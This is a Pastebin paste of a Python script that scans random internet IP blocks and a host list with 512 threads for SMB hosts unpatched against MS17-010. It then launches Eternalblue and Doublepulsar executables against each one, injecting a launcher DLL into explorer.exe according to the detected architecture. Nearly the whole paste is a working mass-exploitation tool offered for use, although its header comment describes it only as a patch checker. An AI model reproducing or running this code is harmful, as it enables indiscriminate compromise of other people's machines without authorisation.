API tools faq
paste
Guest User

Untitled

a guest
Jun 10th, 2018
45
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 8.05 KB | None | 0 0
raw download clone embed print report
  1. from impacket import smb, ntlm, smbconnection, nt_errors
  2. from impacket.uuid import uuidtup_to_bin
  3. import socket
  4. from mysmb import MYSMB
  5. from impacket import smb
  6. from struct import pack, unpack
  7. import socket
  8. import time
  9. import threading
  10. import random
  11. import binascii
  12. import itertools
  13. import os
  14.  
  15. '''
  16. Script for
  17. - check target if MS17-010 is patched or not.
  18. - find accessible named pipe
  19. '''
  20. USERNAME = ''
  21. PASSWORD = ''
  22.  
  23. NDR64Syntax = ('71710533-BEBA-4937-8319-B5DBEF9CCC36', '1.0')
  24.  
  25. MSRPC_UUID_BROWSER = uuidtup_to_bin(('6BFFD098-A112-3610-9833-012892020162','0.0'))
  26. MSRPC_UUID_SPOOLSS = uuidtup_to_bin(('12345678-1234-ABCD-EF00-0123456789AB','1.0'))
  27. MSRPC_UUID_NETLOGON = uuidtup_to_bin(('12345678-1234-ABCD-EF00-01234567CFFB','1.0'))
  28. MSRPC_UUID_LSARPC = uuidtup_to_bin(('12345778-1234-ABCD-EF00-0123456789AB','0.0'))
  29. MSRPC_UUID_SAMR = uuidtup_to_bin(('12345778-1234-ABCD-EF00-0123456789AC','1.0'))
  30.  
  31. pipes = {
  32. 'browser' : MSRPC_UUID_BROWSER,
  33. 'spoolss' : MSRPC_UUID_SPOOLSS,
  34. 'netlogon' : MSRPC_UUID_NETLOGON,
  35. 'lsarpc' : MSRPC_UUID_LSARPC,
  36. 'samr' : MSRPC_UUID_SAMR,
  37. }
  38.  
  39. def check(target):
  40. conn = MYSMB(target)
  41. try:
  42. conn.login(USERNAME, PASSWORD)
  43. except smb.SessionError as e:
  44. print('[-] Login failed: ' + nt_errors.ERROR_MESSAGES[e.error_code][0])
  45. return False
  46. finally:
  47. print('[.] Target OS: ' + conn.get_server_os())
  48.  
  49. tid = conn.tree_connect_andx('\\\\'+target+'\\'+'IPC$')
  50. conn.set_default_tid(tid)
  51.  
  52.  
  53. # test if target is vulnerable
  54. TRANS_PEEK_NMPIPE = 0x23
  55. recvPkt = conn.send_trans(pack('<H', TRANS_PEEK_NMPIPE), maxParameterCount=0xffff, maxDataCount=0x800)
  56. status = recvPkt.getNTStatus()
  57. if status == 0xC0000205: # STATUS_INSUFF_SERVER_RESOURCES
  58. print('[+] The target is not patched!')
  59. return True
  60. else:
  61. print('[-] The target is patched.')
  62.  
  63. # Packets
  64. negotiate_protocol_request = binascii.unhexlify("00000085ff534d4272000000001853c00000000000000000000000000000fffe00004000006200025043204e4554574f524b2050524f4752414d20312e3000024c414e4d414e312e30000257696e646f777320666f7220576f726b67726f75707320332e316100024c4d312e325830303200024c414e4d414e322e3100024e54204c4d20302e313200")
  65. session_setup_request = binascii.unhexlify("00000088ff534d4273000000001807c00000000000000000000000000000fffe000040000dff00880004110a000000000000000100000000000000d40000004b000000000000570069006e0064006f007700730020003200300030003000200032003100390035000000570069006e0064006f007700730020003200300030003000200035002e0030000000")
  66. tree_connect_request = binascii.unhexlify("00000060ff534d4275000000001807c00000000000000000000000000000fffe0008400004ff006000080001003500005c005c003100390032002e003100360038002e003100370035002e003100320038005c00490050004300240000003f3f3f3f3f00")
  67. trans2_session_setup = binascii.unhexlify("0000004eff534d4232000000001807c00000000000000000000000000008fffe000841000f0c0000000100000000000000a6d9a40000000c00420000004e0001000e000d0000000000000000000000000000")
  68.  
  69. def calculate_doublepulsar_xor_key(s):
  70. x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))
  71. x = x & 0xffffffff # this line was added just to truncate to 32 bits
  72. return x
  73.  
  74.  
  75. # The arch is adjacent to the XOR key in the SMB signature
  76. def calculate_doublepulsar_arch(s):
  77. if s & 0xffffffff00000000 == 0:
  78. return "x86 (32-bit)"
  79. else:
  80. return "x64 (64-bit)"
  81.  
  82.  
  83. def print_status(ip, message):
  84. global print_lock
  85.  
  86. with print_lock:
  87. print "[*] [%s] %s" % (ip, message)
  88.  
  89.  
  90. def check_ip(ip):
  91. global negotiate_protocol_request, session_setup_request, tree_connect_request, trans2_session_setup, timeout, verbose
  92.  
  93. # Connect to socket
  94. s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  95. s.settimeout(5)
  96. host = ip
  97. port = 445
  98. s.connect((host, port))
  99.  
  100. # Send/receive negotiate protocol request
  101. s.send(negotiate_protocol_request)
  102. s.recv(1024)
  103.  
  104. # Send/receive session setup request
  105. s.send(session_setup_request)
  106. session_setup_response = s.recv(1024)
  107.  
  108. # Extract user ID from session setup response
  109. user_id = session_setup_response[32:34]
  110.  
  111. # Replace user ID in tree connect request packet
  112. modified_tree_connect_request = list(tree_connect_request)
  113. modified_tree_connect_request[32] = user_id[0]
  114. modified_tree_connect_request[33] = user_id[1]
  115. modified_tree_connect_request = "".join(modified_tree_connect_request)
  116.  
  117. # Send tree connect request
  118. s.send(modified_tree_connect_request)
  119. tree_connect_response = s.recv(1024)
  120.  
  121. # Extract tree ID from response
  122. tree_id = tree_connect_response[28:30]
  123. # Replace tree ID and user ID in trans2 session setup packet
  124. modified_trans2_session_setup = list(trans2_session_setup)
  125. modified_trans2_session_setup[28] = tree_id[0]
  126. modified_trans2_session_setup[29] = tree_id[1]
  127. modified_trans2_session_setup[32] = user_id[0]
  128. modified_trans2_session_setup[33] = user_id[1]
  129. modified_trans2_session_setup = "".join(modified_trans2_session_setup)
  130. s.send(modified_trans2_session_setup)
  131. final_response = s.recv(1024)
  132. s.close()
  133. # Check for 0x51 response to indicate DOUBLEPULSAR infection
  134. if final_response[34] == "\x51":
  135. signature = final_response[18:26]
  136. signature_long = unpack('<Q', signature)[0]
  137. key = calculate_doublepulsar_xor_key(signature_long)
  138. arch = calculate_doublepulsar_arch(signature_long)
  139. print "[+] [%s] DOUBLEPULSAR SMB IMPLANT DETECTED!!! Arch: %s, XOR Key: %s" % (ip, arch, hex(key))
  140. return arch
  141. else:
  142. return False
  143.  
  144. def exploit(IP):
  145. print os.popen("Eternalblue-2.2.0.exe --TargetIp " + IP).read()
  146. arch = check_ip(IP)
  147. if arch == "x86 (32-bit)":
  148. print os.popen("Doublepulsar-1.3.1.exe --TargetIp " + IP + " --Function RunDll --DllPayload launcher.x86.dll --ProcessName explorer.exe").read()
  149. elif arch == "x64 (64-bit)":
  150. print os.popen("Doublepulsar-1.3.1.exe --TargetIp " + IP + " --Function RunDll --DllPayload launcher.x64.dll --ProcessName explorer.exe").read()
  151.  
  152. def gen_IP_block():
  153. not_valid = [10,127,169,172,192]
  154. first = random.randrange(1,256)
  155. while first in not_valid:
  156. first = random.randrange(1,256)
  157. ip = ".".join([str(first),str(random.randrange(1,256)),
  158. str(random.randrange(1,256))])
  159. return ip+".1-255"
  160.  
  161. def ip_range(input_string):
  162. octets = input_string.split('.')
  163. chunks = [map(int, octet.split('-')) for octet in octets]
  164. ranges = [range(c[0], c[1] + 1) if len(c) == 2 else c for c in chunks]
  165.  
  166. for address in itertools.product(*ranges):
  167. yield '.'.join(map(str, address))
  168.  
  169. def Scan(IP):
  170. try:
  171. s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  172. s.settimeout(0.50)
  173. s.connect((IP, 445))
  174. s.close()
  175. if check(IP):
  176. exploit(IP)
  177. except Exception as e:
  178. pass
  179.  
  180. def HaxThread():
  181. while 1:
  182. for IP in ip_range(gen_IP_block()):
  183. Scan(IP)
  184.  
  185.  
  186. def checklist(chunk):
  187. # for ipblock in chunk:
  188. # for host in ip_range(ipblock):
  189. for host in chunk:
  190. Scan(host)
  191.  
  192. threads = 512
  193.  
  194. lines = open("smb.txt","r").read().split("\n")
  195. random.shuffle(lines)
  196.  
  197. def chunkify(lst,n):
  198. return [ lst[i::n] for i in xrange(n) ]
  199.  
  200. chunks = chunkify(lines, threads) # make seperate chunk for each thread
  201.  
  202. for thread in xrange(0,threads):
  203. if thread >= 384:
  204. time.sleep(0.2)
  205. try:
  206. threading.Thread(target = checklist, args = (chunks[thread],)).start()
  207. except:
  208. pass
  209. print "Scanning... Press enter 3 times to stop."
  210.  
  211. for i in range(0,3):
  212. raw_input()
  213.  
  214. os.popen("taskkill /f /pid " + str(os.getpid()))
  215. """
  216. hosts=''''''.split("\n")
  217. random.shuffle(hosts)
  218. for IP in hosts:
  219. try:
  220. threading.Thread(target=Scan, args=(IP,)).start()
  221. except:
  222. time.sleep(10)
  223. try:
  224. threading.Thread(target=Scan, args=(IP,)).start()
  225. except:
  226. pass
  227. pass
  228. """
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!